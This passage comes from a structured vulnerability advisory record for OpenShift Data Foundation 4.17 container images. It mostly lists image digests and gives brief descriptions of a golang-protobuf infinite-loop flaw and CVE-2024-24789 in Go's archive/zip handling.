"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON", }, { cve: "CVE-2024-24789", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2024-06-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2292668", }, ], notes: [ { category: "description", text: "A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.", title: 